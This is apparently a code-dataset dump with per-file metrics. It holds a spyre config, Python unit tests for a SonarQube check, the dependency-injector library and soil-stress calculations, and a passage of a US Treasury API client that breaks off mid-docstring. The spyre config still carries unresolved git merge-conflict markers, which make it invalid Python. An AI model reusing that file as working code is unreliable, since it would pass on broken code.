| 7
|
9865a0f7c14b8f9a402c237beb116ada85d0f407
| 394
|
py
|
Python
|
spyre/testing/align2.py
|
zhong-lab/optics
|
9de1942d9a128183ecb3d360b160b27126e7b8f0
|
[
"BSD-2-Clause"
] | null | null | null |
spyre/testing/align2.py
|
zhong-lab/optics
|
9de1942d9a128183ecb3d360b160b27126e7b8f0
|
[
"BSD-2-Clause"
] | null | null | null |
spyre/testing/align2.py
|
zhong-lab/optics
|
9de1942d9a128183ecb3d360b160b27126e7b8f0
|
[
"BSD-2-Clause"
] | null | null | null |
<<<<<<< HEAD
# Device List
devices = {
}
# Experiment List
spyrelets = {
'align':[
'spyre.spyrelets.align2_spyreley.ALIGNMENT',
{},
{}
],
}
=======
# Device List
devices = {
}
# Experiment List
spyrelets = {
'align':[
'spyre.spyrelets.align2_spyreley.ALIGNMENT',
{},
{}
],
}
>>>>>>> 5f923bba98d7cd3431a71108167c5981f02019fd
| 13.133333
| 52
| 0.532995
| 26
| 394
| 8
| 0.461538
| 0.096154
| 0.163462
| 0.259615
| 0.788462
| 0.788462
| 0.788462
| 0.788462
| 0.788462
| 0.788462
| 0
| 0.106762
| 0.286802
| 394
| 29
| 53
| 13.586207
| 0.633452
| 0.139594
| 0
| 0.666667
| 0
| 0
| 0.275449
| 0.245509
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
9880b8ee8cbf2c26d4251556714fda9dd02f2df6
| 8,236
|
py
|
Python
|
sonarqube/tests/test_unit.py
|
mchelen-gov/integrations-core
|
81281600b3cc7025a7a32148c59620c9592a564f
|
[
"BSD-3-Clause"
] | 663
|
2016-08-23T05:23:45.000Z
|
2022-03-29T00:37:23.000Z
|
sonarqube/tests/test_unit.py
|
mchelen-gov/integrations-core
|
81281600b3cc7025a7a32148c59620c9592a564f
|
[
"BSD-3-Clause"
] | 6,642
|
2016-06-09T16:29:20.000Z
|
2022-03-31T22:24:09.000Z
|
sonarqube/tests/test_unit.py
|
mchelen-gov/integrations-core
|
81281600b3cc7025a7a32148c59620c9592a564f
|
[
"BSD-3-Clause"
] | 1,222
|
2017-01-27T15:51:38.000Z
|
2022-03-31T18:17:51.000Z
|
# (C) Datadog, Inc. 2020-present
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
import pytest
from datadog_checks.base import ConfigurationError
pytestmark = [pytest.mark.unit]
class TestParseConfig:
def test_components_not_mapping(self, sonarqube_check):
check = sonarqube_check({'components': 'foo'})
with pytest.raises(ConfigurationError, match='The `components` setting must be a mapping'):
check.parse_config()
def test_components_not_defined(self, sonarqube_check):
check = sonarqube_check({})
with pytest.raises(ConfigurationError, match='The `components` setting must be defined'):
check.parse_config()
def test_components_empty(self, sonarqube_check):
check = sonarqube_check({'components': {}})
with pytest.raises(ConfigurationError, match='The `components` setting must be defined'):
check.parse_config()
def test_default_tag_not_string(self, sonarqube_check):
check = sonarqube_check({'components': {'foo': {}}, 'default_tag': 9000})
with pytest.raises(ConfigurationError, match='The `default_tag` setting must be a string'):
check.parse_config()
def test_component_not_mapping(self, sonarqube_check):
check = sonarqube_check({'components': {'foo': 'bar'}})
with pytest.raises(ConfigurationError, match='Component `foo` must refer to a mapping'):
check.parse_config()
def test_tag_not_string(self, sonarqube_check):
check = sonarqube_check({'components': {'foo': {'tag': 9000}}})
with pytest.raises(ConfigurationError, match='The `tag` setting must be a string'):
check.parse_config()
class TestPatternCompilation:
def test_default_include_not_array(self, sonarqube_check):
check = sonarqube_check({'components': {'foo': {}}, 'default_include': 'foo'})
with pytest.raises(ConfigurationError, match='The `default_include` setting must be an array'):
check.parse_config()
def test_default_include_pattern_not_string(self, sonarqube_check):
check = sonarqube_check({'components': {'foo': {}}, 'default_include': [9000]})
with pytest.raises(ConfigurationError, match='Pattern #1 in `default_include` setting must be a string'):
check.parse_config()
def test_default_include_pattern_too_broad(self, sonarqube_check):
check = sonarqube_check({'components': {'foo': {}}, 'default_include': ['sonarqube']})
with pytest.raises(ConfigurationError, match='Pattern #1 in `default_include` setting must be more specific'):
check.parse_config()
def test_default_exclude_not_array(self, sonarqube_check):
check = sonarqube_check({'components': {'foo': {}}, 'default_exclude': 'foo'})
with pytest.raises(ConfigurationError, match='The `default_exclude` setting must be an array'):
check.parse_config()
def test_default_exclude_pattern_not_string(self, sonarqube_check):
check = sonarqube_check({'components': {'foo': {}}, 'default_exclude': [9000]})
with pytest.raises(ConfigurationError, match='Pattern #1 in `default_exclude` setting must be a string'):
check.parse_config()
def test_default_exclude_pattern_too_broad(self, sonarqube_check):
check = sonarqube_check({'components': {'foo': {}}, 'default_exclude': ['sonarqube']})
with pytest.raises(ConfigurationError, match='Pattern #1 in `default_exclude` setting must be more specific'):
check.parse_config()
def test_include_not_array(self, sonarqube_check):
check = sonarqube_check({'components': {'foo': {'include': 'foo'}}})
with pytest.raises(ConfigurationError, match='The `include` setting must be an array'):
check.parse_config()
def test_include_pattern_not_string(self, sonarqube_check):
check = sonarqube_check({'components': {'foo': {'include': [9000]}}})
with pytest.raises(ConfigurationError, match='Pattern #1 in `include` setting must be a string'):
check.parse_config()
def test_include_pattern_too_broad(self, sonarqube_check):
check = sonarqube_check({'components': {'foo': {'include': ['sonarqube']}}})
with pytest.raises(ConfigurationError, match='Pattern #1 in `include` setting must be more specific'):
check.parse_config()
def test_exclude_not_array(self, sonarqube_check):
check = sonarqube_check({'components': {'foo': {'exclude': 'foo'}}})
with pytest.raises(ConfigurationError, match='The `exclude` setting must be an array'):
check.parse_config()
def test_exclude_pattern_not_string(self, sonarqube_check):
check = sonarqube_check({'components': {'foo': {'exclude': [9000]}}})
with pytest.raises(ConfigurationError, match='Pattern #1 in `exclude` setting must be a string'):
check.parse_config()
def test_exclude_pattern_too_broad(self, sonarqube_check):
check = sonarqube_check({'components': {'foo': {'exclude': ['sonarqube']}}})
with pytest.raises(ConfigurationError, match='Pattern #1 in `exclude` setting must be more specific'):
check.parse_config()
class TestComponentData:
def test_data_is_present(self, sonarqube_check):
check = sonarqube_check({'components': {'foo': {}, 'bar': {}}})
check.parse_config()
assert len(check._components) == 2
assert 'foo' in check._components
assert 'bar' in check._components
def test_default_default_tag(self, sonarqube_check):
check = sonarqube_check({'components': {'foo': {}}})
check.parse_config()
tag_name, _ = check._components['foo']
assert tag_name == 'component'
def test_default_tag(self, sonarqube_check):
check = sonarqube_check({'components': {'foo': {}}, 'default_tag': 'project'})
check.parse_config()
tag_name, _ = check._components['foo']
assert tag_name == 'project'
def test_tag_override(self, sonarqube_check):
check = sonarqube_check({'components': {'foo': {'tag': 'bar'}}, 'default_tag': 'project'})
check.parse_config()
tag_name, _ = check._components['foo']
assert tag_name == 'bar'
def test_selector_accept_everything_by_default(self, sonarqube_check):
check = sonarqube_check({'components': {'foo': {}}})
check.parse_config()
_, selector = check._components['foo']
assert selector('asdf')
def test_selector_default_include(self, sonarqube_check):
check = sonarqube_check({'components': {'foo': {}}, 'default_include': ['foo.']})
check.parse_config()
_, selector = check._components['foo']
assert selector('foo.bar')
assert not selector('bar.baz')
def test_selector_include_override(self, sonarqube_check):
check = sonarqube_check({'components': {'foo': {'include': ['bar.']}}, 'default_include': ['foo.']})
check.parse_config()
_, selector = check._components['foo']
assert not selector('foo.bar')
assert selector('bar.baz')
def test_selector_default_exclude_override(self, sonarqube_check):
check = sonarqube_check({'components': {'foo': {'include': ['foo.']}}, 'default_exclude': ['foo.bar']})
check.parse_config()
_, selector = check._components['foo']
assert not selector('foo.bar')
assert selector('foo.baz')
def test_selector_exclude_override(self, sonarqube_check):
check = sonarqube_check(
{'components': {'foo': {'include': ['foo.'], 'exclude': ['foo.baz']}}, 'default_exclude': ['foo.bar']}
)
check.parse_config()
_, selector = check._components['foo']
assert selector('foo.bar')
assert not selector('foo.baz')
def test_selector_prefix_ignored(self, sonarqube_check):
check = sonarqube_check({'components': {'foo': {'include': ['sonarqube.foo.']}}})
check.parse_config()
_, selector = check._components['foo']
assert selector('foo.bar')
assert not selector('bar.baz')
| 39.033175
| 118
| 0.661243
| 918
| 8,236
| 5.680828
| 0.092593
| 0.150336
| 0.120805
| 0.12349
| 0.888974
| 0.878428
| 0.851198
| 0.827613
| 0.773921
| 0.736146
| 0
| 0.005782
| 0.20204
| 8,236
| 210
| 119
| 39.219048
| 0.787736
| 0.013113
| 0
| 0.352941
| 0
| 0
| 0.210118
| 0
| 0
| 0
| 0
| 0
| 0.125
| 1
| 0.205882
| false
| 0
| 0.014706
| 0
| 0.242647
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
98ba2c8378867492d657a8949b4f35edfcf1fb65
| 12,227
|
py
|
Python
|
tests/unit/providers/async/test_factory_py36.py
|
YelloFam/python-dependency-injector
|
541131e33858ee1b8b5a7590d2bb9f929740ea1e
|
[
"BSD-3-Clause"
] | null | null | null |
tests/unit/providers/async/test_factory_py36.py
|
YelloFam/python-dependency-injector
|
541131e33858ee1b8b5a7590d2bb9f929740ea1e
|
[
"BSD-3-Clause"
] | null | null | null |
tests/unit/providers/async/test_factory_py36.py
|
YelloFam/python-dependency-injector
|
541131e33858ee1b8b5a7590d2bb9f929740ea1e
|
[
"BSD-3-Clause"
] | null | null | null |
"""Factory provider async mode tests."""
import asyncio
from dependency_injector import containers, providers
from pytest import mark, raises
from .common import RESOURCE1, RESOURCE2, Client, Service, BaseContainer, Container, init_resource
@mark.asyncio
async def test_args_injection():
class ContainerWithArgs(BaseContainer):
client = providers.Factory(
Client,
BaseContainer.resource1,
BaseContainer.resource2,
)
service = providers.Factory(
Service,
client,
)
container = ContainerWithArgs()
client1 = await container.client()
client2 = await container.client()
assert isinstance(client1, Client)
assert client1.resource1 is RESOURCE1
assert client1.resource2 is RESOURCE2
assert isinstance(client2, Client)
assert client2.resource1 is RESOURCE1
assert client2.resource2 is RESOURCE2
service1 = await container.service()
service2 = await container.service()
assert isinstance(service1, Service)
assert isinstance(service1.client, Client)
assert service1.client.resource1 is RESOURCE1
assert service1.client.resource2 is RESOURCE2
assert isinstance(service2, Service)
assert isinstance(service2.client, Client)
assert service2.client.resource1 is RESOURCE1
assert service2.client.resource2 is RESOURCE2
assert service1.client is not service2.client
@mark.asyncio
async def test_kwargs_injection():
class ContainerWithKwArgs(Container):
...
container = ContainerWithKwArgs()
client1 = await container.client()
client2 = await container.client()
assert isinstance(client1, Client)
assert client1.resource1 is RESOURCE1
assert client1.resource2 is RESOURCE2
assert isinstance(client2, Client)
assert client2.resource1 is RESOURCE1
assert client2.resource2 is RESOURCE2
service1 = await container.service()
service2 = await container.service()
assert isinstance(service1, Service)
assert isinstance(service1.client, Client)
assert service1.client.resource1 is RESOURCE1
assert service1.client.resource2 is RESOURCE2
assert isinstance(service2, Service)
assert isinstance(service2.client, Client)
assert service2.client.resource1 is RESOURCE1
assert service2.client.resource2 is RESOURCE2
assert service1.client is not service2.client
@mark.asyncio
async def test_context_kwargs_injection():
resource2_extra = object()
container = Container()
client1 = await container.client(resource2=resource2_extra)
client2 = await container.client(resource2=resource2_extra)
assert isinstance(client1, Client)
assert client1.resource1 is RESOURCE1
assert client1.resource2 is resource2_extra
assert isinstance(client2, Client)
assert client2.resource1 is RESOURCE1
assert client2.resource2 is resource2_extra
@mark.asyncio
async def test_args_kwargs_injection():
class ContainerWithArgsAndKwArgs(BaseContainer):
client = providers.Factory(
Client,
BaseContainer.resource1,
resource2=BaseContainer.resource2,
)
service = providers.Factory(
Service,
client=client,
)
container = ContainerWithArgsAndKwArgs()
client1 = await container.client()
client2 = await container.client()
assert isinstance(client1, Client)
assert client1.resource1 is RESOURCE1
assert client1.resource2 is RESOURCE2
assert isinstance(client2, Client)
assert client2.resource1 is RESOURCE1
assert client2.resource2 is RESOURCE2
service1 = await container.service()
service2 = await container.service()
assert isinstance(service1, Service)
assert isinstance(service1.client, Client)
assert service1.client.resource1 is RESOURCE1
assert service1.client.resource2 is RESOURCE2
assert isinstance(service2, Service)
assert isinstance(service2.client, Client)
assert service2.client.resource1 is RESOURCE1
assert service2.client.resource2 is RESOURCE2
assert service1.client is not service2.client
@mark.asyncio
async def test_async_provider_with_async_injections():
# See: https://github.com/ets-labs/python-dependency-injector/issues/368
async def async_client_provider():
return {"client": "OK"}
async def async_service(client):
return {"service": "OK", "client": client}
class Container(containers.DeclarativeContainer):
client = providers.Factory(async_client_provider)
service = providers.Factory(async_service, client=client)
container = Container()
service = await container.service()
assert service == {"service": "OK", "client": {"client": "OK"}}
@mark.asyncio
async def test_with_awaitable_injection():
class SomeResource:
def __await__(self):
raise RuntimeError("Should never happen")
async def init_resource():
yield SomeResource()
class Service:
def __init__(self, resource) -> None:
self.resource = resource
class Container(containers.DeclarativeContainer):
resource = providers.Resource(init_resource)
service = providers.Factory(Service, resource=resource)
container = Container()
assert isinstance(container.service(), asyncio.Future)
assert isinstance(container.resource(), asyncio.Future)
resource = await container.resource()
service = await container.service()
assert isinstance(resource, SomeResource)
assert isinstance(service.resource, SomeResource)
assert service.resource is resource
@mark.asyncio
async def test_with_awaitable_injection_and_with_init_resources_call():
class SomeResource:
def __await__(self):
raise RuntimeError("Should never happen")
async def init_resource():
yield SomeResource()
class Service:
def __init__(self, resource) -> None:
self.resource = resource
class Container(containers.DeclarativeContainer):
resource = providers.Resource(init_resource)
service = providers.Factory(Service, resource=resource)
container = Container()
await container.init_resources()
assert isinstance(container.service(), asyncio.Future)
assert isinstance(container.resource(), asyncio.Future)
resource = await container.resource()
service = await container.service()
assert isinstance(resource, SomeResource)
assert isinstance(service.resource, SomeResource)
assert service.resource is resource
@mark.asyncio
async def test_injection_error():
async def init_resource():
raise Exception("Something went wrong")
class Container(containers.DeclarativeContainer):
resource_with_error = providers.Resource(init_resource)
client = providers.Factory(
Client,
resource1=resource_with_error,
resource2=None,
)
container = Container()
with raises(Exception, match="Something went wrong"):
await container.client()
@mark.asyncio
async def test_injection_runtime_error_async_provides():
async def create_client(*args, **kwargs):
raise Exception("Something went wrong")
class Container(BaseContainer):
client = providers.Factory(
create_client,
resource1=BaseContainer.resource1,
resource2=None,
)
container = Container()
with raises(Exception, match="Something went wrong"):
await container.client()
@mark.asyncio
async def test_injection_call_error_async_provides():
async def create_client(): # <-- no args defined
...
class Container(BaseContainer):
client = providers.Factory(
create_client,
resource1=BaseContainer.resource1,
resource2=None,
)
container = Container()
with raises(TypeError) as exception_info:
await container.client()
assert "create_client() got" in str(exception_info.value)
assert "unexpected keyword argument" in str(exception_info.value)
@mark.asyncio
async def test_attributes_injection():
class ContainerWithAttributes(BaseContainer):
client = providers.Factory(
Client,
BaseContainer.resource1,
resource2=None,
)
client.add_attributes(resource2=BaseContainer.resource2)
service = providers.Factory(
Service,
client=None,
)
service.add_attributes(client=client)
container = ContainerWithAttributes()
client1 = await container.client()
client2 = await container.client()
assert isinstance(client1, Client)
assert client1.resource1 is RESOURCE1
assert client1.resource2 is RESOURCE2
assert isinstance(client2, Client)
assert client2.resource1 is RESOURCE1
assert client2.resource2 is RESOURCE2
service1 = await container.service()
service2 = await container.service()
assert isinstance(service1, Service)
assert isinstance(service1.client, Client)
assert service1.client.resource1 is RESOURCE1
assert service1.client.resource2 is RESOURCE2
assert isinstance(service2, Service)
assert isinstance(service2.client, Client)
assert service2.client.resource1 is RESOURCE1
assert service2.client.resource2 is RESOURCE2
assert service1.client is not service2.client
@mark.asyncio
async def test_attributes_injection_attribute_error():
class ClientWithException(Client):
@property
def attribute_set_error(self):
return None
@attribute_set_error.setter
def attribute_set_error(self, value):
raise Exception("Something went wrong")
class Container(BaseContainer):
client = providers.Factory(
ClientWithException,
resource1=BaseContainer.resource1,
resource2=BaseContainer.resource2,
)
client.add_attributes(attribute_set_error=123)
container = Container()
with raises(Exception, match="Something went wrong"):
await container.client()
@mark.asyncio
async def test_attributes_injection_runtime_error():
async def init_resource():
raise Exception("Something went wrong")
class Container(containers.DeclarativeContainer):
resource = providers.Resource(init_resource)
client = providers.Factory(
Client,
resource1=None,
resource2=None,
)
client.add_attributes(resource1=resource)
client.add_attributes(resource2=resource)
container = Container()
with raises(Exception, match="Something went wrong"):
await container.client()
@mark.asyncio
async def test_async_instance_and_sync_attributes_injection():
class ContainerWithAttributes(BaseContainer):
resource1 = providers.Resource(init_resource, providers.Object(RESOURCE1))
client = providers.Factory(
Client,
BaseContainer.resource1,
resource2=None,
)
client.add_attributes(resource2=providers.Object(RESOURCE2))
service = providers.Factory(
Service,
client=None,
)
service.add_attributes(client=client)
container = ContainerWithAttributes()
client1 = await container.client()
client2 = await container.client()
assert isinstance(client1, Client)
assert client1.resource1 is RESOURCE1
assert client1.resource2 is RESOURCE2
assert isinstance(client2, Client)
assert client2.resource1 is RESOURCE1
assert client2.resource2 is RESOURCE2
service1 = await container.service()
service2 = await container.service()
assert isinstance(service1, Service)
assert isinstance(service1.client, Client)
assert service1.client.resource1 is RESOURCE1
assert service1.client.resource2 is RESOURCE2
assert isinstance(service2, Service)
assert isinstance(service2.client, Client)
assert service2.client.resource1 is RESOURCE1
assert service2.client.resource2 is RESOURCE2
assert service1.client is not service2.client
| 28.837264
| 98
| 0.705897
| 1,229
| 12,227
| 6.925142
| 0.085435
| 0.075197
| 0.051698
| 0.067207
| 0.839032
| 0.803666
| 0.785219
| 0.755963
| 0.725297
| 0.709787
| 0
| 0.025136
| 0.219105
| 12,227
| 423
| 99
| 28.905437
| 0.866255
| 0.010305
| 0
| 0.757377
| 0
| 0
| 0.023979
| 0
| 0
| 0
| 0
| 0
| 0.308197
| 1
| 0.019672
| false
| 0
| 0.013115
| 0.003279
| 0.17377
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7f9761ba628e5aca0f223df6b82e7c43f43ecb8f
| 2,911
|
py
|
Python
|
tests/test_stresses.py
|
nickmachairas/edafos
|
10fa39949d44603c3de9a2880c533577ff020567
|
[
"MIT"
] | null | null | null |
tests/test_stresses.py
|
nickmachairas/edafos
|
10fa39949d44603c3de9a2880c533577ff020567
|
[
"MIT"
] | null | null | null |
tests/test_stresses.py
|
nickmachairas/edafos
|
10fa39949d44603c3de9a2880c533577ff020567
|
[
"MIT"
] | 1
|
2020-06-10T01:54:43.000Z
|
2020-06-10T01:54:43.000Z
|
from .context import units, SoilProfile
import numpy as np
def case_a():
profile = SoilProfile(unit_system='English', water_table=10)
profile.add_layer(soil_type='cohesionless', height=16, tuw=90)
total_a, pore_a, effective_a = profile.calculate_stress(6, kind='all')
total_b, pore_b, effective_b = profile.calculate_stress(14, kind='all')
return total_a, pore_a, effective_a, total_b, pore_b, effective_b
def test_case_a():
total_a, pore_a, effective_a, total_b, pore_b, effective_b = case_a()
assert total_a == 0.540 * units.kip / units.feet ** 2
assert pore_a == 0.000 * units.kip / units.feet ** 2
assert effective_a == 0.540 * units.kip / units.feet ** 2
assert total_b == 1.260 * units.kip / units.feet ** 2
assert pore_b == 0.2496 * units.kip / units.feet ** 2
assert effective_b == 1.0104 * units.kip / units.feet ** 2
def case_b():
profile = SoilProfile(unit_system='English', water_table=10)
profile.add_layer(soil_type='cohesionless', height=5, tuw=90)
profile.add_layer(soil_type='cohesive', height=11, tuw=110)
total_a, pore_a, effective_a = profile.calculate_stress(6, kind='all')
total_b, pore_b, effective_b = profile.calculate_stress(14, kind='all')
return total_a, pore_a, effective_a, total_b, pore_b, effective_b
def test_case_b():
total_a, pore_a, effective_a, total_b, pore_b, effective_b = case_b()
np.testing.assert_almost_equal(total_a.magnitude, 0.560, 3)
assert total_a.units == units.kip / units.feet ** 2
assert pore_a == 0.000 * units.kip / units.feet ** 2
np.testing.assert_almost_equal(effective_a.magnitude, 0.560, 3)
assert effective_a.units == units.kip / units.feet ** 2
assert total_b == 1.440 * units.kip / units.feet ** 2
assert pore_b == 0.2496 * units.kip / units.feet ** 2
assert effective_b == 1.1904 * units.kip / units.feet ** 2
def case_c():
profile = SoilProfile(unit_system='English', water_table=-7)
profile.add_layer(soil_type='cohesionless', height=4.5, tuw=90)
profile.add_layer(soil_type='cohesive', height=4.5, tuw=110)
total_a, pore_a, effective_a = profile.calculate_stress(-3, kind='all')
total_b, pore_b, effective_b = profile.calculate_stress(7, kind='all')
return total_a, pore_a, effective_a, total_b, pore_b, effective_b
def test_case_c():
total_a, pore_a, effective_a, total_b, pore_b, effective_b = case_c()
assert total_a == 0.2496 * units.kip / units.feet ** 2
assert pore_a == 0.2496 * units.kip / units.feet ** 2
assert effective_a == 0.000 * units.kip / units.feet ** 2
assert total_b == 1.1168 * units.kip / units.feet ** 2
np.testing.assert_almost_equal(pore_b.magnitude, 0.874, 3)
assert pore_b.units == units.kip / units.feet ** 2
np.testing.assert_almost_equal(effective_b.magnitude, 0.243, 3)
assert effective_b.units == units.kip / units.feet ** 2
| 41.585714
| 75
| 0.695294
| 479
| 2,911
| 3.979123
| 0.141962
| 0.075551
| 0.12277
| 0.160546
| 0.896642
| 0.883001
| 0.860965
| 0.773872
| 0.767576
| 0.664743
| 0
| 0.055993
| 0.171762
| 2,911
| 69
| 76
| 42.188406
| 0.73455
| 0
| 0
| 0.26
| 0
| 0
| 0.031271
| 0
| 0
| 0
| 0
| 0
| 0.44
| 1
| 0.12
| false
| 0
| 0.04
| 0
| 0.22
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f6bf1add63527bf4a48cbccdbdcb02f5d33b0d9c
| 25,896
|
py
|
Python
|
treasury/daily_treasury_statements.py
|
areed1192/us-federal-treasury-python-api
|
59969bfd865528072ffcedfd861aab2e0f9764ba
|
[
"MIT"
] | 4
|
2021-05-27T01:43:00.000Z
|
2021-11-02T12:16:50.000Z
|
treasury/daily_treasury_statements.py
|
areed1192/us-federal-treasury-python-api
|
59969bfd865528072ffcedfd861aab2e0f9764ba
|
[
"MIT"
] | null | null | null |
treasury/daily_treasury_statements.py
|
areed1192/us-federal-treasury-python-api
|
59969bfd865528072ffcedfd861aab2e0f9764ba
|
[
"MIT"
] | 1
|
2022-01-16T14:59:32.000Z
|
2022-01-16T14:59:32.000Z
|
from typing import Dict
from typing import List
from treasury.session import FederalTreasurySession
class DailyTreasuryStatements():
"""
## Overview:
----
The Daily Treasury Statement (DTS) dataset contains a series of
tables showing the daily cash and debt operations of the U.S.
Treasury. The data includes operating cash balance, deposits and
withdrawals of cash, public debt transactions, federal tax deposits,
income tax refunds issued (by check and electronic funds transfer (EFT)),
short-term cash investments, and issues and redemptions of securities.
All figures are rounded to the nearest million.
"""
def __init__(self, session: FederalTreasurySession) -> None:
"""Initializes the `PublicDebtInstruments` object.
### Parameters
----
session : `TreasurySession`
An initialized session of the `TreasurySession`.
### Usage
----
>>> treasury_client = FederalTreasuryClient()
>>> daily_treasury_service = treasury_client.daily_treasury_statement()
"""
# Set the session.
self.treasury_session: FederalTreasurySession = session
def __repr__(self) -> str:
"""String representation of the `FederalTreasuryClient.DailyTreasuryStatements` object."""
# define the string representation
str_representation = '<FederalTreasuryClient.DailyTreasuryStatements (active=True, connected=True)>'
return str_representation
def operating_cash_balance(
self,
fields: List[str] = None,
sort: List[str] = None,
filters: List[str] = None,
page_number: int = 1,
page_size: int = 100
) -> Dict:
"""Queries Operating Cash Balance.
### Overview
----
This table represents the Treasury General Account balance.
Additional detail on changes to the Treasury General Account
can be found in the Deposits and Withdrawals of Operating Cash
table. All figures are rounded to the nearest million.
### Parameters
----
fields : List[str] (optional, Default=None)
The fields parameter allows you to select which field(s) should be
included in the response. If desired fields are not specified, all
fields will be returned.
sort : List[str] (optional, Default=None)
The sort parameter allows a user to sort a field in ascending (least
to greatest) or descending (greatest to least) order. When no sort parameter
is specified, the default is to sort by the first column listed. Most API
endpoints are thus sorted by date in ascending order (historical to most
current).
filters : List[str] (optional, Default=None)
Filters are used to view a subset of the data based on specific
criteria. For example, you may want to find data that falls within
a certain date range, or only show records which contain a value
larger than a certain threshold. When no filters are provided,
the default response will return all fields and all data.
page_number : int (optional, Default=1)
The page number will set the index for the pagination, starting
at 1. This allows the user to paginate through the records
returned from an API request
page_size : int (optional, Default=100)
The page size will set the number of rows that are returned
on a request.
### Returns
----
Dict
A collection of `Records` resources.
### Usage
----
>>> treasury_client = FederalTreasuryClient()
>>> daily_treasury_service = treasury_client.daily_treasury_statement()
>>> daily_treasury_service.operating_cash_balance()
"""
if fields:
fields = ','.join(fields)
if filters:
filters = ','.join(filters)
if sort:
sort = ','.join(sort)
content = self.treasury_session.make_request(
method='get',
endpoint='/v1/accounting/dts/dts_table_1',
params={
'format': 'json',
'page[number]': page_number,
'page[size]': page_size,
'fields': fields,
'sort': sort,
'filters': filters
}
)
return content
def deposits_and_withdrawals_operating_cash(
self,
fields: List[str] = None,
sort: List[str] = None,
filters: List[str] = None,
page_number: int = 1,
page_size: int = 100
) -> Dict:
"""Deposits and Withdrawals of Operating Cash.
### Overview
----
This table represents deposits and withdrawals from
the Treasury General Account. A summary of changes to
the Treasury General Account can be found in the Operating
Cash Balance table. All figures are rounded to the nearest
million.
### Parameters
----
fields : List[str] (optional, Default=None)
The fields parameter allows you to select which field(s) should be
included in the response. If desired fields are not specified, all
fields will be returned.
sort : List[str] (optional, Default=None)
The sort parameter allows a user to sort a field in ascending (least
to greatest) or descending (greatest to least) order. When no sort parameter
is specified, the default is to sort by the first column listed. Most API
endpoints are thus sorted by date in ascending order (historical to most
current).
filters : List[str] (optional, Default=None)
Filters are used to view a subset of the data based on specific
criteria. For example, you may want to find data that falls within
a certain date range, or only show records which contain a value
larger than a certain threshold. When no filters are provided,
the default response will return all fields and all data.
page_number : int (optional, Default=1)
The page number will set the index for the pagination, starting
at 1. This allows the user to paginate through the records
returned from an API request
page_size : int (optional, Default=100)
The page size will set the number of rows that are returned
on a request.
### Returns
----
Dict
A collection of `Records` resources.
### Usage
----
>>> treasury_client = FederalTreasuryClient()
>>> daily_treasury_service = treasury_client.daily_treasury_statement()
>>> daily_treasury_service.deposits_and_withdrawals_operating_cash()
"""
if fields:
fields = ','.join(fields)
if filters:
filters = ','.join(filters)
if sort:
sort = ','.join(sort)
content = self.treasury_session.make_request(
method='get',
endpoint='/v1/accounting/dts/dts_table_2',
params={
'format': 'json',
'page[number]': page_number,
'page[size]': page_size,
'fields': fields,
'sort': sort,
'filters': filters
}
)
return content
def public_debt_transactions(
self,
fields: List[str] = None,
sort: List[str] = None,
filters: List[str] = None,
page_number: int = 1,
page_size: int = 100
) -> Dict:
"""Public Debt Transactions.
### Overview
----
This table represents the issues and redemption of marketable
and nonmarketable securities. All figures are rounded to the
nearest million.
### Parameters
----
fields : List[str] (optional, Default=None)
The fields parameter allows you to select which field(s) should be
included in the response. If desired fields are not specified, all
fields will be returned.
sort : List[str] (optional, Default=None)
The sort parameter allows a user to sort a field in ascending (least
to greatest) or descending (greatest to least) order. When no sort parameter
is specified, the default is to sort by the first column listed. Most API
endpoints are thus sorted by date in ascending order (historical to most
current).
filters : List[str] (optional, Default=None)
Filters are used to view a subset of the data based on specific
criteria. For example, you may want to find data that falls within
a certain date range, or only show records which contain a value
larger than a certain threshold. When no filters are provided,
the default response will return all fields and all data.
page_number : int (optional, Default=1)
The page number will set the index for the pagination, starting
at 1. This allows the user to paginate through the records
returned from an API request
page_size : int (optional, Default=100)
The page size will set the number of rows that are returned
on a request.
### Returns
----
Dict
A collection of `Records` resources.
### Usage
----
>>> treasury_client = FederalTreasuryClient()
>>> daily_treasury_service = treasury_client.daily_treasury_statement()
>>> daily_treasury_service.public_debt_transactions()
"""
if fields:
fields = ','.join(fields)
if filters:
filters = ','.join(filters)
if sort:
sort = ','.join(sort)
content = self.treasury_session.make_request(
method='get',
endpoint='/v1/accounting/dts/dts_table_3a',
params={
'format': 'json',
'page[number]': page_number,
'page[size]': page_size,
'fields': fields,
'sort': sort,
'filters': filters
}
)
return content
def adjusted_public_debt_transactions(
self,
fields: List[str] = None,
sort: List[str] = None,
filters: List[str] = None,
page_number: int = 1,
page_size: int = 100
) -> Dict:
"""Adjustment of Public Debt Transactions
to Cash Basis.
### Overview
----
This table represents cash basis adjustments to the issues
and redemptions of Treasury securities in the Public Debt
Transactions table. All figures are rounded to the nearest
million.
### Parameters
----
fields : List[str] (optional, Default=None)
The fields parameter allows you to select which field(s) should be
included in the response. If desired fields are not specified, all
fields will be returned.
sort : List[str] (optional, Default=None)
The sort parameter allows a user to sort a field in ascending (least
to greatest) or descending (greatest to least) order. When no sort parameter
is specified, the default is to sort by the first column listed. Most API
endpoints are thus sorted by date in ascending order (historical to most
current).
filters : List[str] (optional, Default=None)
Filters are used to view a subset of the data based on specific
criteria. For example, you may want to find data that falls within
a certain date range, or only show records which contain a value
